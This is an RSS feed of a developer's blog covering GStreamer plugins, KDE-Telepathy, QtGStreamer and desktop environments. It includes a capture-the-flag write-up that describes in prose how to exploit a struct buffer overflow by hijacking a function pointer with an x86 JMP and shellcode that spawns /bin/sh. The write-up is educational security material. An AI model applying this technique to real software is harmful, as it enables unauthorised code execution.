Gkiagia’s Bloghttps://gkiagia.wordpress.com
Fri, 22 Feb 2019 15:24:05 +0000 en
hourly
1 http://wordpress.com/https://s0.wp.com/i/buttonw-com.pngGkiagia’s Bloghttps://gkiagia.wordpress.com
ipcpipeline: Splitting a GStreamer pipeline into multiple processeshttps://gkiagia.wordpress.com/2017/11/17/ipcpipeline-splitting-a-gstreamer-pipeline-into-multiple-processes/
https://gkiagia.wordpress.com/2017/11/17/ipcpipeline-splitting-a-gstreamer-pipeline-into-multiple-processes/#respondFri, 17 Nov 2017 13:25:04 +0000http://gkiagia.wordpress.com/?p=200Earlier this year I worked on a certain GStreamer plugin that is called “ipcpipeline”. This plugin provides elements that make it possible to interconnect GStreamer pipelines that run in different processes. In this blog post I am going to explain how this plugin works and the reason why you might want to use it in your application.

Why ipcpipeline?

In GStreamer, pipelines are meant to be built and run inside a single process. Normally one wouldn’t even think about involving multiple processes for a single pipeline. You can (and should) involve multiple threads, of course, which is easily done using the queue element, in order to do parallel processing. But since you can involve multiple threads, why would you want to involve multiple processes as well?

Splitting part of a pipeline to a different process is useful when there is one or more elements that need to be isolated for security reasons. Imagine the case where you have an application that uses a hardware video decoder and therefore has device access privileges. Also imagine that in the same pipeline you have elements that download and parse video content directly from a network server, like most Video On Demand applications would do. Although I don’t mean to say that GStreamer is not secure, it can be a good idea to think ahead and make it as hard as possible for an attacker to take advantage of potential security flaws. In theory, maybe someone could exploit a bug in the container parser by sending it crafted data from a fake server and then take control of other things by exploiting those device access privileges, or cause a system crash. ipcpipeline could help to prevent that.

How does it work?

In the – oversimplified – diagram below we can see how the media pipeline in a video player would look like with GStreamer:

With ipcpipeline, this pipeline can be split into two processes, like this:

As you can see, the split mainly involves 2 elements: ipcpipelinesink, which serves as the sink for the first pipeline, and ipcpipelinesrc, which serves as the source for the second pipeline. These two elements internally talk to each other through a unix pipe or socket, transferring buffers, events, queries and messages over this socket, thus linking the two pipelines together.

This mechanism doesn’t look very special, though. You might be wondering at this point, what is the difference between using ipcpipeline and some other existing mechanism like a pair of fdsink/fdsrc or udpsink/udpsrc or RTP? What is special about these elements is that the two pipelines behave as if they were a single pipeline, with the elements of the second one being part of a GstBin in the first one:

The diagram above illustrates how you can think of a pipeline that uses the ipcpipeline mechanism. As you can see, ipcpipelinesink behaves as a GstBin that contains the whole remote pipeline. This practically means that whenever you change the state of ipcpipelinesink, the remote pipeline’s state changes as well. It also means that all messages, events and queries that make sense are forwarded from one pipeline to the other, trying to implement as closely as possible the behavior that a GstBin would have.

This design practically allows you to modify an existing application to use this split-pipeline mechanism without having to change the pipeline control logic or implement your own IPC for controlling the second pipeline. It is all integrated in the mechanism already.

ipcpipeline follows a master-slave design. The pipeline that controls the state changes of the other pipeline is called the “master”, while the other one is called the “slave”. In the above example, the pipeline that contains the ipcpipelinesink element is the “master”, while the other one is the “slave”. At the moment of writing, the opposite setup is not implemented, so it’s always the downstream part of the pipeline that can be slaved and ipcpipelinesink is always the “master”.

While it is possible to have only one “master” pipeline, it is possible to have multiple “slave” ones. This allows, for example, to split an audio decoder and a video decoder into different processes:

It is also possible to have multiple ipcpipelinesink elements connect to the same slave pipeline. In this case, the slave pipeline will follow the state that is closest to PLAYING between the two states that it will get from the two ipcpipelinesinks. Also, messages from the slave pipeline will only be forwarded through one of the two ipcpipelinesinks, so you will not notice any duplicate messages. Behavior should be exactly the same as in the split slaves scenario.

Where is the code?

ipcpipeline is part of the GStreamer bad plugins set (here). Documentation is included with the code and there are also some examples that you can try out to get familiar with it. Happy hacking!

]]>https://gkiagia.wordpress.com/2017/11/17/ipcpipeline-splitting-a-gstreamer-pipeline-into-multiple-processes/feed/0On desktop environments – part 1: the journeyhttps://gkiagia.wordpress.com/2016/05/05/on-desktop-environments-part-1-the-journey/
https://gkiagia.wordpress.com/2016/05/05/on-desktop-environments-part-1-the-journey/#commentsThu, 05 May 2016 20:01:53 +0000http://gkiagia.wordpress.com/?p=123Disclaimer: This blog post contains a lot of flame starter material. Please note that this is all just my personal opinion at the time of writing and it may well conflict with yours. Please have your fire extinguishers ready to cool yourselves down and prevent the flames from advancing to the comment section of this post. Thank you in advance.

Exploring the desktop environments land

When I first started using GNU/Linux, back around 2005 I believe, my very first desktop environment was KDE 3. Actually, it was KDE 2, but soon I realized that the distribution I had on CD-ROM was quite old at that point in time, so I decided to try a more modern one. KDE 3 served me quite well at the time. All the applications I was using were working pretty well and the desktop was quite nice and also familiar, coming from a Windows background. On KDE 3 I learned to program my first UI applications, thanks to the powerful Qt Designer, and I was pretty happy about everything.

Later on, around 2008, I decided to join the KDE community and help with the effort of making KDE 4 the best desktop environment ever. In the KDE community, I’ve been involved in many areas, starting from kwrited (yes with ‘d’ in the end, a pretty useless component that most people have no idea it exists) then Kopete, KDE-Telepathy, DrKonqi, KCrash, Krdc and also Debian KDE packaging, general bugfixing, triaging and other things…

Not many years later, though, I got disappointed by the “KDE Plasma Desktop” (meaning the desktop environment as a whole, but not the individual libraries and applications). I realized that my vision of making KDE 4 the best desktop environment could not realistically be achieved and since at my work at Collabora I was working a lot with Glib/GNOME libraries and applications, I decided to switch to GNOME. I did that as a trial for myself, in order to experience and understand better that side of the desktop environments land.

Almost three years later, I got fed up and concluded that I didn’t like GNOME. There are many details that contribute to that conclusion… the non-existent configuration in applications, the (too-much-)space-wasting default Adwaita theme, the controversial client-side decorations, the forceful gnome-shell plugin API breaks every now and then (which effectively disable all your gnome-shell plugins and give you a nice reminder kick that you have to switch to another DE :P), the somehow unnatural feel of gnome-terminal (I never got used to it, I kept using konsole instead), the horrible open/save file dialogs, and other little things…

Design matters

To be a bit fair though, GNOME is not a bad desktop environment as a whole. It’s not bad at all. Actually, it’s probably the best one! Why? Because it is well designed. The gnome-shell looks really good! It also feels good, it is very fast and responsive (unlike plasma-desktop, sorry…). The functions of the shell all have a meaning (unlike plasma-desktop again with all those useless widgets). It is easy to find your way to them. The applications shipped by default are all working well and have a good purpose and good integration with the rest of the desktop. The names on the application icons actually make sense. GDM also looks pretty good and is very easy to use. In addition, the environment is very well integrated with technologies to automate things that are necessary for a desktop, such as network management, volume control, power management, bluetooth, etc. All these features really look and behave as if they are part of the desktop and although they are not very configurable, the defaults are really sensible and well thought. The overall feeling of GNOME for me is really the best. But still, I don’t really like it…

The journey continues

After coming to that conclusion, I wanted to find myself something better. Unfortunately, there are not that many options out there. Mate, Cinnamon, Unity, etc are too much GNOME-like (and not necessarily better). Others are not as mature and not really delivering some of the features that I wanted. Soon, I found myself back trying KDE again. I instantly made two observations: first, KWin is awesome, possibly the best floating window manager on X11 (and soon on Wayland too \o/); second, some KDE applications are irreplaceable… Kate, Konsole, Dolphin, Okular… they are the best. Unfortunately, the rest of the KDE Plasma Desktop was still not really up to the equivalent GNOME standards, so that was still not an option for me.

Finally, I concluded that there is no existing desktop environment that suits me. However, noticing that there are some awesome pieces of software out there, I thought that perhaps I could sort-of create my own desktop by combining good components from existing DE projects. In the next part of this blog post, I am going to describe the setup that I have currently ended up experimenting with.

]]>https://gkiagia.wordpress.com/2016/05/05/on-desktop-environments-part-1-the-journey/feed/2GStreamer on wayland with GTK+https://gkiagia.wordpress.com/2014/06/10/gstreamer-on-wayland-with-gtk/
https://gkiagia.wordpress.com/2014/06/10/gstreamer-on-wayland-with-gtk/#respondTue, 10 Jun 2014 12:24:15 +0000http://gkiagia.wordpress.com/?p=114During the past few months I’ve been occasionally working on integrating GStreamer better with wayland. GStreamer already has a ‘waylandsink’ element in gst-plugins-bad, but the implementation is very limited. One of the things I’ve been working on was to add GstVideoOverlay support in it, and recently, I managed to make this work nicely embedded in a GTK+ window.
gtk+ video player demo running on weston

I’m happy to say that it works pretty well, even though GTK does not support wayland sub-surfaces, which was being thought of as a problem initially. It turns out there is no problem with that, and both the GTK and GstVideoOverlay APIs are sufficient to make this work. However, there needs to be a small addition in GstVideoOverlay to allow smooth resizing. Currently, I have a GstWaylandVideo API that includes those additions.

This essentially means that as soon as this work is merged (hopefully soon), there is nothing stopping applications like totem from being ported to wayland

I believe embedding waylandsink in Qt should also work without any problems, I just haven’t tested it.

If you are interested, check the code. The code of the above running demo can also be found here, and the ticket for merging this branch is being tracked here.

I should say many thanks here to my employer, Collabora, for sponsoring this work.

]]>https://gkiagia.wordpress.com/2014/06/10/gstreamer-on-wayland-with-gtk/feed/0CommonsFesthttps://gkiagia.wordpress.com/2014/04/29/commonsfest/
https://gkiagia.wordpress.com/2014/04/29/commonsfest/#commentsTue, 29 Apr 2014 10:10:32 +0000http://gkiagia.wordpress.com/?p=109Hello all! Long time no blog. The reason I decided to blog this time is that I want to spread the word about CommonsFest, a different festival that will take place in less than two weeks (9-11 May) in my home city, Heraklion, in Crete.

What is it?

CommonsFest is a festival that aims to promote freedom of knowledge (or free knowledge) and peer-to-peer collaboration for the creation and management of the Commons. A philosophy that has spread through free software communities and extends to many aspects of our daily lives, such as the arts, governance, construction of machinery, tools and other goods. In other words, it aims to raise the awareness of people about the philosophy of open source in its generalisation, involving open source code, open hardware, creative commons and similar initiatives like open source ecology, open governance, etc.

Why?

This festival was conceived and organized for the first time in Heraklion last year by a group of volunteers, myself being one of them, who felt that it is worth promoting this philosophy to people that are unaware of its existence, especially in this time of economic crisis where it is clear that people need to cooperate more and share in order to go forward. This year we are repeating it, aiming to be better and achieve even more. Our long term vision is to spread this philosophy to as many people as possible around the world and eventually improve our lives by changing the way people think. We believe in this idea that the world would be a better place if we all shared our knowledge and worked together, equally, for the well-being of all of us.

I love the idea, how can I be part of it?

There are many ways you can help. First of all, this year, the festival is crowd-funded to cover our expenses (mainly printing and transportation for the speakers). If you like the idea and would like to support us directly, you could give a small donation. Another way you can help is to just share this with other people that may (or may not) be interested – even if it’s just to raise their awareness about the subject ;). Finally, you could help to achieve our goals by organizing something similar in your area. All our material (logos, texts, slideshows, etc) is freely licensed under creative commons licences, so you can also use them if you want.

Where can I learn more?

]]>https://gkiagia.wordpress.com/2014/04/29/commonsfest/feed/1Video calls in KDE-Telepathyhttps://gkiagia.wordpress.com/2012/03/29/video-calls-in-kde-telepathy/
https://gkiagia.wordpress.com/2012/03/29/video-calls-in-kde-telepathy/#commentsThu, 29 Mar 2012 00:08:08 +0000http://gkiagia.wordpress.com/?p=101Well, I think I owed you this one Remember back in 2009 when I was working on KCall as part of the GSoC program? Well, it may have taken 2.5 years more, but I’m now pleased to announce that it’s finally in a ready-to-use state \o/ Don’t expect it to be perfect, of course. It still has a long way to go.

A little bit of history

When my GSoC finished in 2009, there were 2 main problems with KCall. The first one was that the bits of the telepathy specification for doing calls (i.e. the “StreamedMedia” channel type) were problematic, not to mention that the API of the telepathy-farsight library, which was the only way to use StreamedMedia, was also weird and it took me too many tries to finally understand it (in late 2010…), which in simple words means that KCall was very unstable beacause it used the API in the wrong way (if there really was a right way to use it…). The second problem was that there was no telepathy integration in the KDE desktop, so KCall would need to have a proper contact list, account manager and other stuff that it shouldn’t have to implement.

In late 2010, the KDE-Telepathy project started evolving and we finally managed to make a first release last summer with the necessary components to use telepathy on the KDE desktop. At about the same time, work began on a new API for doing calls in telepathy, the so-called “Call” channel type, plus telepathy-farstream, the new and enhanced version of telepathy-farsight. It took a little longer than expected, but finally a few weeks ago, thanks to the awesome work of my colleagues at Collabora who engineered the whole thing, the “Call” API and telepathy-farstream were finished and released. Fortunately, last year I had already worked on porting the call-ui to the draft Call API, using the draft telepathy-qt Call bindings that used to be in the telepathy-qt4-yell module. So, now I only had to first update the telepathy-qt bindings to the latest and greatest API specification and then do the same with the call-ui, plus fix a bit the UI, which was way too ugly. And so I did.

The present and the future

The UI is far from perfect at the moment, but the engine seems to work reliably. I have many additions and improvements in mind. However, since I suck at UI design, I’d love having mockups of ideas from people that can actually design UIs. And I’d also love having other people to implement those ideas, since I’m a lazy man… (ok, I don’t really mean that). So, if you feel like helping (either way), this is your chance to get involved

The current UI will be included in the next KDE-Telepathy release, 0.4, which is scheduled for next month. Be prepared.

Try it

So, if you can’t wait for the next KDE-Telepathy release and want to try this now, what you need is the latest ktp-call-ui from git master with all of its dependencies. To make a call, simply right click one of your contacts in the contact list and click “audio call” or “video call”. Alternatively, you can do this directly from the text-ui or the contact plasmoid. Note that older versions of those components also have audio/video call buttons, but they will try to start StreamedMedia calls instead, which will fail. Also note that calls require XMPP (jabber, google talk) at the moment, but SIP support is also on its way upstream.

]]>https://gkiagia.wordpress.com/2012/03/29/video-calls-in-kde-telepathy/feed/35Introducing qtvideosink – GStreamer meets QMLhttps://gkiagia.wordpress.com/2012/02/09/introducing-qtvideosink-gstreamer-meets-qml/
https://gkiagia.wordpress.com/2012/02/09/introducing-qtvideosink-gstreamer-meets-qml/#commentsThu, 09 Feb 2012 18:56:36 +0000http://gkiagia.wordpress.com/?p=96During the past month I’ve been working on a new GStreamer element called qtvideosink. The purpose of this element is to allow painting video frames from GStreamer on any kind of Qt surface and on any platform supported by Qt. A “Qt surface” can be a QWidget, a QGraphicsItem in a QGraphicsView, a QDeclarativeItem in a QDeclarativeView, and even off-screen surfaces like QImage, QPixmap, QGLPixelBuffer, etc… The initial reason for working on this new element was to support GStreamer video in QML, which is something that many people have asked me about in the past. Until now there was only QtMultimedia supporting this, with some code in phonon being in progress as well. But of course, the main disadvantage with both QtMultimedia and phonon is that although they support this feature with GStreamer as the backend, they don’t allow you to mix pure GStreamer code with their QML video item, therefore they are useless in case you need to do something more advanced using the GStreamer API directly. Hence the need for something new.

My idea with qtvideosink was to implement something that would be a standalone GStreamer element, which would not require the developer to use a specific high level API in order to paint video on QML. In the past I have also written another similar element, qwidgetvideosink, which is basically the same idea, but for QWidgets. After looking at the problem a bit more carefully, I realized that in fact qwidgetvideosink and qtvideosink would share a lot of their internal logic and therefore I could probably do one element generic enough to do both painting on QWidgets and on QML and perhaps more surfaces. And so I did.

I started by taking the code of qtgst-qmlsink, a project that was started by a colleague here at Collabora last year, with basically the same intention, but which was never finished properly. This project was initially based on QtMultimedia’s GStreamer backend. As a first step, I did some major refactoring to clean it up from its QtMultimedia dependencies and to make it an independent GStreamer plugin (as it used to be a library). Then I merged it with qwidgetvideosink, so that they can share the common parts of the code and also wrote a unit test for it. Sadly, the unit test proved something that I was suspecting already: the original QtMultimedia code was quite buggy. But I must say I enjoyed fixing it. It was a good opportunity for me to learn a lot of things on video formats and on OpenGL.

How does it work

First of all, you can create the sink with the standard gst_element_factory_make method (or its equivalent in the various bindings). You will notice that this sink provides two signals, an action signal (a slot in Qt terminology) called “paint” and a normal signal called “update”. “update” is emitted every time the sink needs the surface to be repainted. This is meant to be connected directly to QWidget::update() or QGraphicsItem::update() or something similar. The “paint” slot takes a QPainter pointer and a rectangle (x, y, width, height as qreals) as its arguments and paints the video inside the given rectangle using the given painter. This is meant to be called from the widget’s paint event or the graphics item’s paint() function. So, all you need to do is to take care of those two signals and qtvideosink will do everything else.

Getting OpenGL into the game

You may be wondering how this sink does the actually painting. Using QPainter, using OpenGL or maybe something else? Well, there are actually two variants of this video sink. The first one, qtvideosink, just uses QPainter. It is able to handle only RGB data (only a subset of the formats that QImage supports) and does format conversion and scaling in software. The second one, however, qtglvideosink, uses OpenGL/OpenGLES with shaders. It is able to handle both RGB and YUV formats and does format conversion and scaling in hardware. It is used in exactly the same way as qtvideosink, but it requires a QGLContext pointer to be set on its “glcontext” property before its state is set to READY. This of course means that the underlying surface must support OpenGL (i.e. it must be one of QGLWidget, QGLPixelBuffer or QGLFrameBufferObject). To get this working on QGraphicsView/QML, you just need to set a QGLWidget as the viewport of QGraphicsView and use this widget’s QGLContext in the sink.

qtglvideosink uses either GLSL shaders or ARB fragment program shaders if GLSL is not supported. This means it should work on pretty much every GPU/driver combination that exists for linux on both desktop and emebedded systems. In case no shaders are supported, it will fail to change its state to READY and then you can just substitute it with qtvideosink, which is guaranteed to work on all platforms supported by Qt.

qtglvideosink also has an extra feature: it supports the GstColorBalance interface. Color adjustment is done in the shaders together with the format conversion. qtvideosink doesn’t support this, as it doesn’t make sense. Color adjustment would need to be implemented in software and this can be done better by plugging a videobalance element before the sink. No need to duplicate code.

So, which variant to use?

If you are interested in painting video on QGraphicsView/QML, then qtglvideosink is the best choice of all sinks. And if for any reason the system doesn’t support OpenGL shaders, qtvideosink is the next choice. Now if you intend to paint video on normal QWidgets, it is best to use one of the standard GStreamer sinks for your platform, unless you have a reason not to. QWidgets can be transformed to native system windows by calling their winId() method and therefore any sink that implements the GstXOverlay interface can be embedded in them. On X11 for example, xvimagesink is the best choice. However, if you need to do something more tricky and embedding another window doesn’t suit you very well, you could use qtglvideosink in a QGLWidget (preferrably) or qtvideosink / qwidgetvideosink on a standard QWidget.

Note that qwidgetvideosink is basically the same thing as qtvideosink, with the difference that it takes a QWidget pointer in its “widget” property and handles everything internally for painting on this widget. It has no signals. Other than that, it still does painting in software with QPainter, just like qtvideosink. This is just there to keep compatibility with code that may already be using it, as it already exists in QtGStreamer 0.10.1.

This is actually 0.10 stuff… What about GStreamer 0.11/1.0?

Well, if you are interested in 0.11, you will be happy to hear that there is already a partial 0.11 port around. Two weeks ago I was at the GStreamer 1.0 hackfest at Malaga, Spain, and one of the things I did there was porting qtvideosink to 0.11. I must say the port was quite easy to do. However, last week I added some more stuff in the 0.10 version that I haven’t ported yet to 0.11. I’ll get to that soon, it shouldn’t take long.

Try it out

The code lives in the qt-gstreamer repository. The actual video sinks are independent from the qt-gstreamer bindings, but qt-gstreamer itself has some helper classes for using them. Firstly there is QGst::Ui::VideoWidget, a QWidget subclass which will accept qtvideosink, qtglvideosink and qwidgetvideosink just like any other video sink and will transparently do all the required work to paint the video in it. Secondly, there is QGst::Ui::GraphicsVideoWidget and QGst::Ui::GraphicsVideoSurface. Those two are meant to be used together to paint video on a QGraphicsView or QML. You can find more about them at the documentation in graphicsvideosurface.h (this will soon be on the documentation website). Finally, there is a QtGStreamer QML plugin, which exports a “VideoItem” element if you “import QtGStreamer 0.10”. This is also documented in the GraphicsVideoSurface header. All of this will soon be released in the upcoming qt-gstreamer 0.10.2.

]]>https://gkiagia.wordpress.com/2012/02/09/introducing-qtvideosink-gstreamer-meets-qml/feed/23Telepathy-KDE technical preview released / See you at the BDShttps://gkiagia.wordpress.com/2011/08/02/telepathy-kde-technical-preview-released-see-you-at-the-bds/
https://gkiagia.wordpress.com/2011/08/02/telepathy-kde-technical-preview-released-see-you-at-the-bds/#commentsTue, 02 Aug 2011 10:25:55 +0000http://gkiagia.wordpress.com/?p=88So, last week we released the first version (technical preview) of Telepathy-KDE along with KDE SC 4.7. The release is separated from the KDE SC (it’s just a technical preview and hasn’t gone through kdereview yet), it just happened to be released at the same time. I would like to thank everyone in the team for making this release possible, after all those years that this project has been sitting there in playground, and especially David and Martin who did most of the hard work lately. If you want to try it, check with your distribution for binary packages or compile it from source (the source can be downloaded from here).

In other news, I am going to the Desktop Summit this year. See you all there

]]>https://gkiagia.wordpress.com/2011/08/02/telepathy-kde-technical-preview-released-see-you-at-the-bds/feed/3fosscomm 2011 – fosswar exploit challenge solutionhttps://gkiagia.wordpress.com/2011/05/16/fosscomm-2011-fosswar-exploit-challenge-solution/
https://gkiagia.wordpress.com/2011/05/16/fosscomm-2011-fosswar-exploit-challenge-solution/#commentsSun, 15 May 2011 22:45:35 +0000http://gkiagia.wordpress.com/?p=76Last weekend I went to fosscomm 2011, a Greek conference on Free and Open Source Software, together with my friend Nick Kossifidis (mickflemm), at the University of Patras. I can say we had a wonderful time there. I met many interesting people, some that I knew from the internet already and some that I didn’t, I attended many interesting talks about topics that I had limited or no knowledge and I also took part in fosswar, a wargames competition that had some quite interesting challenges.

Fosswar was very exciting. There were five challenges (you can get them here if you are interested). People were organized in teams, splitting the 5 challenges between them or collaborating on some of them. When it started, there was no room to sit with my laptop, so I stayed for some time trying to help my friend with the challenge that he started solving (challenge 5, reverse engineering). A little later, some people left, so I thought why not start solving challenge 4 (exploitation), which nobody in my friend’s team had started solving. And so I did…

In this challenge, we were given the source code of a C program that had an exploitable security hole that we had to exploit. The program works like this: Initially, it allocates an array of many “struct bogus”, where “struct bogus” is:

struct bogus {
size_t magic;
fptr f;
char buffer[16];
} bogus_t;

This array is dynamically allocated with mmap() on a predefined memory address (0x80000000). After that, it populates the buffers of all the “struct bogus” with the character ‘M’ (0x4D), the magic numbers with ~0 (0xFFFFFFFF on 32-bit and 0xFFFFFFFFFFFFFFFF on 64-bit) and the function pointers (fptr f) with 0. When everything is initialized, it starts reading from stdin and places whatever it reads on a 1KB buffer on the stack. Then, it copies the contents of the buffer to the 16-byte buffer of a random “struct bogus” in the array and then it iterates over all the “struct bogus” in the array, starting from the second one, verifying that their magic number is still ~0 and executing the function f, if the function pointer f is not null. Ok, this is not the most useful program in the world, it is *made* to be exploited, but well, let’s see how this can be done.

One might think that reading from stdin to a buffer on the stack looks like a stack overflow might be possible. However, this is not true in this case, since the call to read() uses sizeof(buffer) – 1 as the maximum size, so one could not possibly inject more than 1KB of data in this buffer. But, when this 1KB buffer is copied to the 16-byte buffer of one of the “struct bogus”, there is no size check! Therefore, it is possible to write more than 16 bytes and overwrite the contents of many “struct bogus” in the array. Then, since those structs have a function pointer that is called if it is not null, one can probably set this pointer to point to the injected data in the array and put some nice assembly instructions there.

So far so good, but there is one remaining problem. We don’t know the exact address of the “struct bogus” that we have access to, because the index in the array where our data is written is chosen with rand(). That’s where those lines start being useful:

This looks weird at first sight. What it does is that it fills the first 5 bytes of the aforementioned array (the map pointer) with 0xe9 followed by a number that is the relative number of bytes from the 5th byte of the array to the beggining of the “buffer” member of the “struct bogus” that is right after the one that we have access to. After googling a bit, one can find that 0xe9 is in fact the opcode of the x86 JMP command and the number is exactly the offset needed to jump to the first byte of this buffer.

This fills the 16 bytes of the “buffer” member with 0x4D (the value that was already there from the initialization – anything else will also work), then it overwrites the next “struct bogus” and places 0xFFFFFFFF on the magic number (required, else the check will fail), 0x80000000 on the function pointer (the beginning of the array, where there is the JMP command) and a shellcode on the rest of it. The shellcode can be as long as we want, since execution is never going to go further than this point, so the magic number of the next struct doesn’t need to be correct.

The fun here was not exploiting the program, but creating a shellcode that does something useful! I had never done this before and I also had limited knowledge of the x86 instruction set and how linux system calls work, however after some research I managed to do it (but I did this at home, later, not during the competition; during the competion I was only able to see in gdb that $eip changes and points to this address in my data and then it crashed). Here is the shellcode that I wrote (with some help from existing shellcodes on the internet):

This invokes /bin/sh after setting stdin to be the same as stdout. I had to do this dup2() call because when running the program on the shell like this “./exp < input_x86”, stdin is the input file and when the shell executes, the file is already at its end, so the shell exits due to EOF. But after setting stdin be equal to stdout (which is the terminal device), input on the shell works fine, so here it is:

That’s it! I hope you found it interesting too. If you are interested in the other challenges as well, you can read about them here.

]]>https://gkiagia.wordpress.com/2011/05/16/fosscomm-2011-fosswar-exploit-challenge-solution/feed/3QtGStreamer 0.10.1https://gkiagia.wordpress.com/2011/01/25/qtgstreamer-0-10-1/
https://gkiagia.wordpress.com/2011/01/25/qtgstreamer-0-10-1/#commentsTue, 25 Jan 2011 14:59:40 +0000http://gkiagia.wordpress.com/?p=69This weekend I released QtGStreamer 0.10.1, the first stable version of QtGStreamer. This release marks the beginning of the stable 0.10 series of QtGStreamer that will continue for the lifetime of GStreamer 0.10. For those of you that don’t yet know what QtGStreamer is, it is a set of libraries that provide Qt-style C++ bindings for GStreamer, plus extra helper classes and elements for better integration of GStreamer in Qt applications.

I must say thanks a lot to Mauricio, the co-developer of QtGStreamer, who helped me a lot with the design and code, to the GStreamer community, who accepted this project under the GStreamer umbrella with great enthusiasm, to Nokia for sponsoring it, to Collabora for assigning me and Mauricio to work on it and to all those developers who are already using it in their projects and have helped us by providing feedback.

The future

Development of course does not stop here. It just started. We will try to improve the bindings as much as we can by exporting more and more of GStreamer’s functionality, by adding more and more convenience methods/classes and/or gstreamer elements that ease the use of GStreamer in Qt applications and by collecting opinions and ideas from all of you out there that will use this API. This last bit is quite important imho, so, if you have any suggestions to make about things that you don’t like or things that you would like to see implemented, please file a bug to let us know.

Use in KDE

I am quite happy to see that this library already has early adopters in KDE. Apart of course from my telepathy-kde-call-ui (ex kcall), which is the “father” of QtGStreamer, QtGStreamer is also used in kamoso, a cheese-like camera app, whose authors, Alex Fiestas and Aleix Pol, have been very patient waiting for me to release QtGStreamer before they release kamoso and have also been very supportive during all this time (thanks!).

Personal thoughts

I must say this project was fun to develop. During development, I learned a lot about C++ that I didn’t know before and I also learned how GObject works, which I must say is quite interesting, although ugly for my taste. Learning more about C++ was my main source of interest from the beginning of the project, and for some period of time I couldn’t even imagine that this project would ever reach here, but I kept coding it for myself. Obviously, I am more than happy now that this finally evolved into something that is also useful for others and has wide acceptance

]]>https://gkiagia.wordpress.com/2011/01/25/qtgstreamer-0-10-1/feed/35What is Telepathy-KDEhttps://gkiagia.wordpress.com/2010/09/20/what-is-telepathy-kde/
https://gkiagia.wordpress.com/2010/09/20/what-is-telepathy-kde/#commentsMon, 20 Sep 2010 14:47:57 +0000http://gkiagia.wordpress.com/?p=64There seems to be a lot of confusion about what the Telepathy-KDE project is and what it has to do with Kopete. I’ll try and explain in this blog post everything, so that it is clear to everyone.

First of all, Telepathy is a framework for writing applications that can use real-time communication and collaboration features. In Telepathy, there are the so-called connection managers that connect to IM and similar networks and the clients that use those connections over D-Bus. This allows dividing the several tasks of an IM client to several applications, which makes it easier to reuse code and easier for applications to add collaboration features without caring about protocols, contact lists, presence status and all that stuff.

In Telepathy-KDE what we are trying to do is to integrate Telepathy with the KDE Plasma desktop. What we imagine is not to have a monolithic IM client like kopete or empathy but to integrate all the features of an IM client directly into the desktop. For this reason, we are going to add the following components into the KDE SC:

A presence plasmoid. This will be a plasmoid sitting in your notification area or somewhere else, showing your online status and allowing you with a popup to change status, to enter a status message, etc…

A contact list application. This will be a standalone application that will just show the contact list. It will of course have all the necessary actions to start a chat or a call or do something else with any of your contacts.

A chat window application. This will be a standalone application providing just the chat window. When a new chat starts, it will be auto-launched via D-Bus service activation and allow you to chat.

A VoIP call window application. This will again be a standalone application providing the call window, also auto-launched to handle calls. This is actually KCall, what I wrote in last year’s summer of code, but it won’t have the contact list and won’t be named “KCall”.

An approver daemon. This will be a daemon sitting in the background and listening for incoming channels. When somebody requests that you start doing something with him (be it chat, video call, play a game together, share your desktop, etc…), it will show a KNotify popup allowing you to accept or reject the request.

A file transfer daemon. This will be a daemon that will be auto-launched like the chat and call windows when you want to do a file transfer to or from one of your contacts and handle that file transfer for you.

The nepomuk integration daemon. This is an implementation detail, really internal, not shown to the users. This will allow you to have metacontacts by pushing all of your contacts into the nepomuk database and defining relations between them. It will also allow at some point sharing contacts with akonadi and other cool stuff.

In the future, other components could be added, such as a logger daemon that logs all your chats into files or into a database or something like that and of course it will be very simple to add collaboration features to other applications for doing anything with your contacts. For example, krdc already has telepathy integration and it is possible that if someone requests you over telepathy to share his desktop, you could use krdc to view his desktop, without caring about firewalls or anything. Unfortunately, the server side of this is currently only implemented in gnome, so only a user using gnome can currently share his desktop with you, but that will be fixed in the future.

As a sidenote here, telepathy also allows you to share D-Bus connections over the IM network, which makes it extremely easy to add collaboration features to an application that has no idea about networks or protocols. With this feature, called D-Bus tubes, all you have to do in your application is to expose a D-Bus interface which will be called from the remote side using normal D-Bus calls, as if the other side was running on the same computer. With this feature, we could add collaboration features to many KDE applications in the future very easily. Unfortunately, this currently requires a patch in Qt that has not been merged yet and it is not yet certain if it will make it for Qt 4.8 (which actually screws the whole feature, but we can still hope it will be in Qt 4.8, so that we can start using it in KDE 4.7 or 4.8).

To get to kopete now, as you realize, there is no much place for kopete in all this. So, as soon as we merge all this in the KDE SC, kopete is going to get out of there. All in all, it has not received much development in the last years and even many of its former maintainers are now looking towards Telepathy-KDE, so I don’ t think we have any reason to keep it around. In addition, kopete’s code is not very much reusable in its current form, so we are not going to use it at all. Many people have stated that this may be a bad idea, but we have actually tried to port code from kopete and it didn’t really work, so we decided to do a new implementation from scratch.

I hope that pretty much explains everything now. Let’s stop talking about kopete and let’s start working on Telepathy-KDE

PS: If you want to get involved with it, come and find us on irc in #kde-telepathy on irc.freenode.net.